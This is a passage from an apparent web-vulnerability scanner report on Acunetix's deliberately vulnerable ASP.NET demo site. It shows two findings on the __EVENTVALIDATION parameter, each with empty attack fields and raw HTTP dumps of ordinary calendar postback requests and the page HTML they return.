their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1147 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,147 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8295&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgCAcJA%2FmNoIZGRkCOeeHbiO8XMsB13vHazfj6j4YSk%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLyxLxyAu2JnvwLAseQjP4OAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268DAr%2BTz8IMAr%2BTz8IMApC62esPApC62esPApC6zY4HApC6zY4HApC64SUCkLrhJQKQupX4CQKQupX4CQKQuomfAQKQuomfAQKQur2yCgKQur2yCgKQutHWAwKQutHWAwKQusXtDAKQusXtDAKQurnVCQKQurnVCQKQuq3oAgKQuq3oAgLX2eyeBwLX2eyeBwLX2YA1AtfZgDUC19m0yAkC19m0yAkC19mo7wIC19mo7wIC19ncgwoC19ncgwoC19nwpgMC19nwpgMC19nk%2FQwC19nk%2FQwC19mYkAQC19mYkAQC19nM%2BQIC19nM%2BQIC19ngnAoC19ngnAoCqODyhQ0CqODyhQ0CqODm2AYCqODm2AYCqOCa%2Fw8CqOCa%2Fw8CqOCOkgcCqOCOkgcCqOCiKQKo4KIpAqjg1s0JAqjg1s0JAqjgyuACAqjgyuACVNehln4mn%2B7sbfCRrhtNky52ApY%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:35:12 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgCAcJA/mNoIZGRkCOeeHbiO8XMsB13vHazfj6j4YSk=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLyxLxyAu2JnvwLAseQjP4OAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268DAr+Tz8IMAr+Tz8IMApC62esPApC62esPApC6zY4HApC6zY4HApC64SUCkLrhJQKQupX4CQKQupX4CQKQuomfAQKQuomfAQKQur2yCgKQur2yCgKQutHWAwKQutHWAwKQusXtDAKQusXtDAKQurnVCQKQurnVCQKQuq3oAgKQuq3oAgLX2eyeBwLX2eyeBwLX2YA1AtfZgDUC19m0yAkC19m0yAkC19mo7wIC19mo7wIC19ncgwoC19ncgwoC19nwpgMC19nwpgMC19nk/QwC19nk/QwC19mYkAQC19mYkAQC19nM+QIC19nM+QIC19ngnAoC19ngnAoCqODyhQ0CqODyhQ0CqODm2AYCqODm2AYCqOCa/w8CqOCa/w8CqOCOkgcCqOCOkgcCqOCiKQKo4KIpAqjg1s0JAqjg1s0JAqjgyuACAqjgyuACVNehln4mn+7sbfCRrhtNky52ApY=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:White" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1175 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,175 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8387&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAIBxzorg2ghkZGRR5O9EX4EJYk0BPVqOtpsSiQ8dwQ%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLZ1rwQAv6Q%2FOMBAtCnkuUEArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODAwK%2Fk%2F%2FECQK%2Fk%2F%2FECQK%2Fk5ObAQK%2Fk5ObAQK%2Fk4e%2BCgK%2Fk4e%2BCgK%2Fk7vVAwK%2Fk7vVAwK%2Fk6%2FoDAK%2Fk6%2FoDAK%2Fk8OMBAK%2Fk8OMBAK%2Fk%2FejDQK%2Fk%2FejDQK%2Fk%2BvGBgK%2Fk%2BvGBgK%2Fk9%2BvAwK%2Fk9%2BvAwK%2Fk%2FPCDAK%2Fk%2FPCDAKQut3rDwKQut3rDwKQuvGOBwKQuvGOBwKQuuUlApC65SUCkLqZ%2BAkCkLqZ%2BAkCkLqNnwECkLqNnwECkLqhsgoCkLqhsgoCkLrV1gMCkLrV1gMCkLrJ7QwCkLrJ7QwCkLq91QkCkLq91QkCkLrR6QICkLrR6QIC19mQngcC19mQngcC19mENQLX2YQ1AtfZuMgJAtfZuMgJAtfZrO8CAtfZrO8CAtfZwIMKAtfZwIMKAtfZ9KYDAtfZ9KYDAtfZ6P0MAtfZ6P0MAtfZnJAEAtfZnJAER7Alf7A1H2XWz0%2BmUbGBvpG3Tbo%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:39:18 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAIBxzorg2ghkZGRR5O9EX4EJYk0BPVqOtpsSiQ8dwQ==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLZ1rwQAv6Q/OMBAtCnkuUEArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODAwK/k//ECQK/k//ECQK/k5ObAQK/k5ObAQK/k4e+CgK/k4e+CgK/k7vVAwK/k7vVAwK/k6/oDAK/k6/oDAK/k8OMBAK/k8OMBAK/k/ejDQK/k/ejDQK/k+vGBgK/k+vGBgK/k9+vAwK/k9+vAwK/k/PCDAK/k/PCDAKQut3rDwKQut3rDwKQuvGOBwKQuvGOBwKQuuUlApC65SUCkLqZ+AkCkLqZ+AkCkLqNnwECkLqNnwECkLqhsgoCkLqhsgoCkLrV1gMCkLrV1gMCkLrJ7QwCkLrJ7QwCkLq91QkCkLq91QkCkLrR6QICkLrR6QIC19mQngcC19mQngcC19mENQLX2YQ1AtfZuMgJAtfZuMgJAtfZrO8CAtfZrO8CAtfZwIMKAtfZwIMKAtfZ9KYDAtfZ9KYDAtfZ6P0MAtfZ6P0MAtfZnJAEAtfZnJAER7Alf7A1H2XWz0+mUbGBvpG3Tbo=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:White" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this 